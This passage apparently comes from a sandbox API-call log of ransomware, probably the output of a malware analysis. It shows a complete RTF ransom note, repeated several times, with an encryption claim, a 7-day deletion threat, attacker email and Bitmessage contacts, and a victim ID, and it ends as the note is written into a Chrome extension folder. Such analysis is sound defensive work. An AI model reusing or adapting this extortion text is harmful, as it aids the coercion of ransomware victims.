}}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0272.356] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0272.356] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7fÓ\x08", lpUsedDefaultChar=0x0) returned 8717 [0272.356] WriteFile (in: hFile=0x294, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0272.357] CloseHandle (hObject=0x294) returned 1 [0272.357] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user 